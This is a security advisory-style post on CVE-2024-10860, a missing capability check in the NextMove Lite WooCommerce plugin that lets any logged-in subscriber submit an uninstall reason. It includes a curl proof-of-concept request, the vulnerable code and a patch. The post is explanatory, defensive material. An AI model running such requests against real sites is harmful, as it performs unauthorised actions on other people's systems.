CVE CyberSecurity Database News

CVE-2024-10860 - How NextMove Lite’s Missing Check Lets Subscribers Submit Uninstall Reasons on WooCommerce Sites

Poster -

CVE-2024-10860 sheds light on a common but risky oversight in WordPress plugin development: missing access control on important actions. This time, the plugin in the spotlight is "NextMove Lite – Thank You Page for WooCommerce." Widely used to enhance customer experience after checkout, it quietly harbored a vulnerability that let even the lowest-level logged-in users perform actions they shouldn’t be able to do.

Let’s walk through what was wrong, how it could be exploited, and what you should do about it.

What’s the Vulnerability?

In all versions of NextMove Lite up to and including 2.19., the _submit_uninstall_reason_action() function allows any authenticated user—even a simple Subscriber—to send a deactivation reason for the plugin. Normally, only admins should be able to do this. But the function forgot a capability check.

In other words:

If you’re logged in as any user (not even an admin!), you can submit a plugin uninstall reason. Not a critical, site-destroying bug, but a definite violation of permissions.

Here’s a simplified look at the relevant code in the vulnerable plugin

add_action('wp_ajax_submit_uninstall_reason', '_submit_uninstall_reason_action');

function _submit_uninstall_reason_action() {
    // No capability check!
    $reason = isset($_POST['reason']) ? sanitize_text_field($_POST['reason']) : '';
    // ...some code to save or process the reason...
    wp_send_json_success(['message' => 'Reason submitted successfully!']);
}

No check for user permissions like

if ( ! current_user_can( 'manage_options' ) ) {
    wp_send_json_error(['message' => 'Permission denied!']);
    exit;
}

Proof of Concept Exploit

Imagine you run a store where hundreds of people have customer accounts (usually just "Subscribers" in WordPress). A malicious person could run the following AJAX request as a logged-in user—no admin rights needed:

curl -X POST 'https://victimsite.com/wp-admin/admin-ajax.php?action=submit_uninstall_reason'; \
     -d 'reason=Just+for+fun'
     -b 'wordpress_logged_in_...'

What happens?
The server replies:

{ "success": true, "data": { "message": "Reason submitted successfully!" } }

The attacker just submitted an uninstall reason as if they were the site owner.

Annoying: Attackers could spam fake uninstall reasons or confuse audit trails.

- Foot in the Door: Bugs like this are often suggestive of overall weak access handling. If one AJAX action is insecure, there might be others with more serious impact.

Remediation

Update now!
The plugin authors have fixed this bug in version 2.19.1 and above. The safest move is to update your plugin from WordPress.org.

If for some reason you must patch an older version yourself, add an early capability check in the function:

function _submit_uninstall_reason_action() {
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error(['message' => 'Permission denied!']);
        exit;
    }
    // ...rest of the code...
}

References

- Original Vulnerability Report (Wordfence Threat Intelligence)
- Plugin Page
- CVE Record

Takeaway

CVE-2024-10860 is a textbook lesson in why all privileged plugin actions—especially those available over AJAX—*must* include user capability checks. While this one is minor in impact, it easily could have been worse. Don’t wait; update your plugins regularly and review your own code for permission checks!

Have thoughts or questions? Drop them below, and keep your sites secure! 🚀

Timeline

Published on: 02/28/2025 10:15:09 UTC